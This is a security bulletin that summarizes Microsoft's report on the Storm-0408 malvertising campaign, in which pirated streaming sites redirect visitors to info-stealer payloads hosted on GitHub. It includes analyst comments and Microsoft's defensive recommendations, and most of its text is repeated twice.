Malvertising Campaign Leads to Info Stealers Hosted on GitHub
Summary:
A new blog post by Microsoft highlights a large-scale malvertising campaign that has been active since early December, 2024, and that has impacted nearly one million devices to date. The campaign, tracked under an activity cluster Microsoft refers to as Storm-0408, has targeted a wide range of organizations and industries, including both consumer and enterprise devices, with the end goal of deploying info-stealers on targeted systems and exfiltrating data of interest. Based on intrusions observed by Microsoft, actors are leveraging illegal pirated streaming websites to embed malvertising redirectors within movie frames, which subsequently route traffic through one or two additional malicious redirectors, ultimately leading to another website, such as a malware or tech support scam website, which then redirects to a GitHub repository hosting malicious payloads.
According to Microsoft, the malware hosted on GitHub is designed to establish an initial foothold on the victim’s device and act as a dropper for additional payloads such as Lumma Stealer and Doenerium, both of which are capable of collecting and exfiltrating system and browser information from targeted devices. “Depending on the initial payload, the deployment of NetSupport, a remote monitoring and management (RMM) software, was also often deployed alongside the infostealer. Besides the information stealers, PowerShell, JavaScript, VBScript, and AutoIT scripts were run on the host. The threat actors incorporated use of living-off-the-land binaries and scripts (LOLBAS) like PowerShell.exe, MSBuild.exe, and RegAsm.exe for C2 and data exfiltration of user data and browser credentials,” note researchers in their new blog post.
Security Officer Comments:
Threat actors continue to exploit legitimate platforms to host malicious infrastructure, making it increasingly difficult for security systems to detect and mitigate such threats. In addition to GitHub, Microsoft has observed malicious payloads being hosted on popular services such as Discord and Dropbox. The widespread use and trust placed in these platforms provide an ideal opportunity for attackers to deliver their payloads, often bypassing endpoint security solutions with little chance of detection. The method of injecting malvertising redirectors into pirated movies hosted on illegal streaming websites is rather interesting. This tactic enables threat actors to easily infect unsuspecting users seeking to access unauthorized content, further demonstrating the evolving sophistication of cybercriminals in exploiting such sites for malicious purposes.
Suggested Corrections:
Recommendations from Microsoft:
Link(s):
https://www.microsoft.com/en-us/sec...aign-leads-to-info-stealers-hosted-on-github/
A new blog post by Microsoft highlights a large-scale malvertising campaign that has been active since early December, 2024, and that has impacted nearly one million devices to date. The campaign, tracked under an activity cluster Microsoft refers to as Storm-0408, has targeted a wide range of organizations and industries, including both consumer and enterprise devices, with the end goal of deploying info-stealers on targeted systems and exfiltrating data of interest. Based on intrusions observed by Microsoft, actors are leveraging illegal pirated streaming websites to embed malvertising redirectors within movie frames, which subsequently route traffic through one or two additional malicious redirectors, ultimately leading to another website, such as a malware or tech support scam website, which then redirects to a GitHub repository hosting malicious payloads.
According to Microsoft, the malware hosted on GitHub is designed to establish an initial foothold on the victim’s device and act as a dropper for additional payloads such as Lumma Stealer and Doenerium, both of which are capable of collecting and exfiltrating system and browser information from targeted devices. “Depending on the initial payload, the deployment of NetSupport, a remote monitoring and management (RMM) software, was also often deployed alongside the infostealer. Besides the information stealers, PowerShell, JavaScript, VBScript, and AutoIT scripts were run on the host. The threat actors incorporated use of living-off-the-land binaries and scripts (LOLBAS) like PowerShell.exe, MSBuild.exe, and RegAsm.exe for C2 and data exfiltration of user data and browser credentials,” note researchers in their new blog post.
Security Officer Comments:
Threat actors continue to exploit legitimate platforms to host malicious infrastructure, making it increasingly difficult for security systems to detect and mitigate such threats. In addition to GitHub, Microsoft has observed malicious payloads being hosted on popular services such as Discord and Dropbox. The widespread use and trust placed in these platforms provide an ideal opportunity for attackers to deliver their payloads, often bypassing endpoint security solutions with little chance of detection. The method of injecting malvertising redirectors into pirated movies hosted on illegal streaming websites is rather interesting. This tactic enables threat actors to easily infect unsuspecting users seeking to access unauthorized content, further demonstrating the evolving sophistication of cybercriminals in exploiting such sites for malicious purposes.
Suggested Corrections:
Recommendations from Microsoft:
- Require multifactor authentication (MFA). While certain attacks such as adversary-in-the-middle (AiTM) phishing attempt to circumvent MFA, implementation of MFA remains an essential pillar in identity security and is highly effective at stopping a variety of threats.
- Leverage phishing-resistant authentication methods such as FIDO Tokens, or Microsoft Authenticator with passkey. Avoid telephony-based MFA methods to avoid risks associated with SIM-jacking.
- Implement Entra ID Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
- Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
- Enable Network Level Authentication for Remote Desktop Service connections.
- Enable Local Security Authority (LSA) protection to block credential stealing from the Windows local security authority subsystem.
- AppLocker can restrict specific software tools prohibited within the organization, such as reconnaissance, fingerprinting, and RMM tools, or grant access to only specific users.
Link(s):
https://www.microsoft.com/en-us/sec...aign-leads-to-info-stealers-hosted-on-github/